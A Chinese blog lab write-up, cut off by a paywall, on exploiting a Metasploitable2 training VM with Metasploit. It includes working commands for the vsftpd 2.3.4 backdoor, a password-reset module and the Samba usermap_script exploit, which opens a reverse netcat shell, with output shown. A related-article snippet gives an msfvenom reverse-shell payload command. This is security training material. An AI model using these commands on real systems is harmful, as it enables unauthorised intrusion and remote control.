渗透测试MSTable2靶机实验

最新推荐文章于 2024-08-11 20:47:36 发布
最新推荐文章于 2024-08-11 20:47:36 发布
阅读量3.9k 收藏 11
点赞数 3
分类专栏: web服务器 kali MSTable 文章标签: linux 信息安全 kali linux centos 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mystic_JJ/article/details/113764539
版权
本文详述了对MSTable2靶机的渗透测试过程,包括使用Kali Linux进行环境配置,利用nessus扫描漏洞,通过msfconsole工具执行vsftpd、httpd、Samba等漏洞的攻击,最终成功获取meterpreter会话,并利用UnrealIRCd漏洞尝试建立连接。
摘要由CSDN通过智能技术生成

实验名称:渗透测试MSTable2靶机实验
实验目的:对MSTable2进行渗透测试
实验环境:操作系统:Kali Linux虚拟机一台(4G)MSTable2靶机一台
实验步骤:
一、先配置好实验环境再进行漏洞扫描
1、先配置好MSTable2靶机,配置IP为192.168.22.10
在这里插入图片描述
先使用Kali nessus进行对MSTable2的扫描
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用nessus先进行扫描着,再实行渗透
(二)启动msfonsole框架,进行扫描
┌──(root💀k)-[~]
└─# msfconsole 开启msfonsole工具
在这里插入图片描述
1、使用扫描工具
msf6 > db_nmap -A -T4 192.168.22.10
在这里插入图片描述
如果不能扫描成功,就进行添加
在这里插入图片描述
再打开一个终端,使用msfconsole框架
在这里插入图片描述
可能存在漏洞,使用search
msf6 > db_nmap -A -T4 192.168.22.10
在这里插入图片描述
漏洞实施漏洞攻击
Vsftpd漏洞攻击
msf6 > search vsftpd 2.3.4 进行查找
在这里插入图片描述
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 引用模块
[] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.22.10 设置攻击目标主机的靶机
rhosts => 192.168.22.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run 执行
在这里插入图片描述
2、httpd基本鉴权重置密码攻击(可进行拒绝服务攻击)
在这里插入图片描述
在这里插入图片描述
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use auxiliary/admin/http/intersil_pass_reset 引用模块
msf6 auxiliary(admin/http/intersil_pass_reset) > set rhosts 192.168.22.10
rhosts => 192.168.22.10 设置攻击目标靶机IP地址
msf6 auxiliary(admin/http/intersil_pass_reset) > run 执行
[] Running module against 192.168.22.10
[*] Auxiliary module execution completed
在这里插入图片描述
msf6 auxiliary(admin/http/intersil_pass_reset) > info 查看漏洞模块详细信息
在这里插入图片描述
3、httpd mod 协商文件名
在这里插入图片描述
在这里插入图片描述
4、利用Samba漏洞实现任意命令行
在这里插入图片描述
msf6 auxiliary(scanner/http/mod_negotiation_brute) > search Samba 3.0.20

Matching Modules

Name Disclosure Date Rank Check Description

0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba “username map script” Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 auxiliary(scanner/http/mod_negotiation_brute) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.22.10
rhosts => 192.168.22.10
msf6 exploit(multi/samba/usermap_script) > run

[] Started reverse TCP handler on 192.168.22.100:4444
[] Command shell session 2 opened (192.168.22.100:4444 -> 192.168.22.10:40232) at 2021-02-02 15:02:17 +0800

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
exit

[*] 192.168.22.10 - Command shell session 2 closed.
在这里插入图片描述
5、升级shell会话为meterpreter会话
接上一个先Ctrl+Z把shell会话放在后台
^Z
Background sess

最低0.47元/天 解锁文章
Mystic_JJ
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1749
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全。
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 813
metaspolitable靶机、安全、渗透、靶机
渗透测试实例--Metasploitable2靶机
lxy123_com的博客
02-01 4175
实验环境:Kali Linux虚拟机一台,4G运行,Metasploitable2靶机一台 实验目的: 实验步骤:
West-Wild-v1.1靶机渗透测试
最新发布
weixin_58786230的博客
08-11 283
【代码】West-Wild-v1.1靶机渗透测试
Kali、Metasploitable2部署
u011417723的博客
03-03 1204
Kali与靶向机部署
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2356
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机是安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1847
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机
靶机 Metasploitable2漏洞
Tom_to的博客
05-24 204
Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4232
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
MSF使用总结
qq_44657899的博客
09-25 4537
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
安装Metasploitable2
imtech的博客
01-31 2505
安装Metasploitable2
渗透Metasploitable主机
sGanYu
09-06 2796
攻击机:kali 靶机:Metasploitable2(一个特制的ubuntu操作系统,设计初衷作为安全工具测试和演示常见漏洞攻击的环境,默认开放高危端口如21、22、23、445、6000等等,而且具有很多未打补丁的高危漏洞) Metasploitable2漏洞:弱口令漏洞(如vnc、mysql、PostgreSQL等)、Samba MS-RPC Shell命令注入漏洞 、Vsftpd漏洞、Linux NFS共享目录配置漏洞、Tomcat管理台默认口令漏洞、root用户弱口令漏洞(SSH爆破) .
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 6943
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploitable2使用指南
热门推荐
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值